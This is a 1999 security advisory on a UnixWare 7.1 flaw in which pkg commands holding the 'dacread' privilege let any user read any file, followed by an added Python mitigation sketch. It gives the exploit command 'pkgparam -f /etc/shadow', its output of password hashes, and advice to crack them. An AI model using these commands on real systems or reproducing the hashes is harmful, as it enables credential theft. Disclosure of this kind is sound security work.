
unixware.pkg.txt

06 Dec 1999 | Reported by Brock Tellier | Type: packetstorm | Source: packetstormsecurity.com

UnixWare allows any user to read files due to vulnerabilities in pkg commands and privilege settings.

Code
`Greetings,  
  
OVERVIEW  
Any user may read any file on the system.  
  
BACKGROUND  
Only UnixWare 7.1 has been tested.  
  
DETAILS  
As previously stated, UnixWare binaries gain additional privileges via  
standard suid/sgid AND /etc/security/tcb/privs. The majority of the UnixWare  
"pkg" commands, such as pkginfo, pkgcat, pkgparam, etc., are vulnerable to a bug  
which will allow any user to read any file on the system as a result of their  
additional "dacread" permission in the privs file.  
  
The dacread permission allows a process to override the Discretionary Access  
Controls (DAC) for read-only operations. Basically, a process with the  
dacread permissions is able to bypass the mode bits and ownership on a file,  
but only for reading it. A process with dacwrite permissions can bypass mode  
bits to write to or execute that file.  
  
I'm pretty sure that the bugs I found in the pkg commands were introduced by  
their addition to the privs file. As far as I can tell, there is virtually no  
reason for them to be able to read any file on the system.   
  
  
All around, this additional privilege thing, well, sucks. Consider now that  
the truss(1) command will allow the user to see any file i/o that happens  
between a process and the system since it isn't suid/sgid. Thus, if there is  
*any* way that you can make pkg* read from a file, even if the output is never  
printed, you can examine truss output to get the file's contents.  
  
EXPLOIT  
The worst offender of pkg* is pkgparam, which will print the contents of a  
file to stdout, though I've been able to get most of the pkg programs to read  
from /etc/shadow in one way or another and grab the contents with truss.  
  
bash-2.02$ ls -la /bin/pkgparam  
-r-xr-xr-x 1 root sys 166784 May 21 1999 /bin/pkgparam  
bash-2.02$ /bin/pkgparam -f /etc/shadow  
Dy0l3OC7XHsj.:10925::::::  
NP:6445::::::  
NP:6445::::::  
NP:6445::::::  
NP:6445::::::  
NP:6445::::::  
NP:6445::::::  
NP:6445::::::  
NP:6445::::::  
NP:6445::::::  
*LK*:::::::  
*LK*:::::::  
*LK*:::::::  
BgusHRQZ9MH2U:10878::::::  
*LK*:::::::  
*LK*:::::::  
*LK*:::::::  
*LK*:::::::  
*LK*:::::::  
nv.Xrh2V3vArc:10882::::::  
ozT.yeRe1/dxY:10882::::::  
RinwpQfqabYbc:10928::::::  
bash-2.02$   
  
Now just concatenate the first field of /etc/passwd with this file and run  
your favorite cracker.  
  
Brock Tellier  
UNIX Systems Administrator  
Chicago, IL, USA  
[email protected]  
  
  
`
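
A mitigation sketch for the bug class described under DETAILS, added here as an example and not part of the original advisory or of any UnixWare code: a tool that runs with a read override such as dacread re-applies the invoking user's owner/group/other read check to a caller-supplied path before it reads anything. The function names, the uid/gid arguments and the sample file are hypothetical, and only the file's own mode bits are evaluated.

```python
import os
import stat
import tempfile

def dac_allows_read(st, uid, gids):
    # Classic owner/group/other evaluation; uid 0 gets no special treatment.
    if uid == st.st_uid:
        return bool(st.st_mode & stat.S_IRUSR)
    if st.st_gid in gids:
        return bool(st.st_mode & stat.S_IRGRP)
    return bool(st.st_mode & stat.S_IROTH)

def read_for_caller(path, uid, gids):
    # Check the opened descriptor (fstat), not the path, so the file cannot
    # be swapped between check and read. Only the file's own mode bits are
    # evaluated; directory search permission and ACLs are out of scope.
    fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW | os.O_NONBLOCK)
    with os.fdopen(fd, "rb") as fh:
        st = os.fstat(fh.fileno())
        if not stat.S_ISREG(st.st_mode):
            raise PermissionError(f"{path}: not a regular file")
        if not dac_allows_read(st, uid, gids):
            raise PermissionError(f"{path}: uid {uid} may not read this file")
        return fh.read()

def demo():
    # Constructed sample: a mode-0600 file standing in for a protected file.
    results = {}
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "protected")
        with open(path, "wb") as fh:
            fh.write(b"constructed sample\n")
        os.chmod(path, 0o600)
        st = os.stat(path)
        stranger = st.st_uid + 1  # hypothetical caller who is not the owner
        results["owner"] = read_for_caller(path, st.st_uid, [])
        try:
            read_for_caller(path, stranger, [])
            results["stranger"] = "read"
        except PermissionError:
            results["stranger"] = "denied"
        os.chmod(path, 0o640)
        results["group_member"] = read_for_caller(path, stranger, [st.st_gid])
    return results

if __name__ == "__main__":
    print(demo())
```

The permission check runs before the first read call, so a denied request never pulls file contents into the process where a tracer such as truss could observe them.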
